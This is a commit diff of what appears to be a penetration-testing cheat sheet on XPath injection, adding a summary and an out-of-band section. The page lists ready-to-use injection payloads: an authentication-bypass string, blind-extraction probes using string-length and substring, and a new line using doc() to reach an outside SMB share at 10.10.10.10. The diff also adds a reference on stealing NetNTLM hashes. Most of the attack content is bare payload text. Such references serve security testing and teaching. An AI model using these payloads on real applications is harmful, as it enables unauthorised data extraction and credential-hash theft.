Out of band XPATH

patch-1
Swissky 2019-10-22 23:06:35 +02:00
parent 3464611c00
commit 88f020381d
1 changed files with 21 additions and 6 deletions

View File

@ -1,6 +1,13 @@
# XPATH injection # XPATH injection
XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. > XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
## Summary
* [Exploitation](#exploitation)
* [Blind exploitation](#blind-exploitation)
* [Out Of Band Exploitation](#out-of-band-exploitation)
* [References](#references)
## Exploitation ## Exploitation
@ -24,16 +31,24 @@ x' or name()='username' or 'x'='y
## Blind Exploitation ## Blind Exploitation
```sql
1. Size of a string 1. Size of a string
```sql
and string-length(account)=SIZE_INT and string-length(account)=SIZE_INT
```
2. Extract a character 2. Extract a character
```sql
substring(//user[userid=5]/username,2,1)=CHAR_HERE substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
``` ```
## Out Of Band Exploitation
```powershell
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
```
## References ## References
* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/) * [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/)
* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)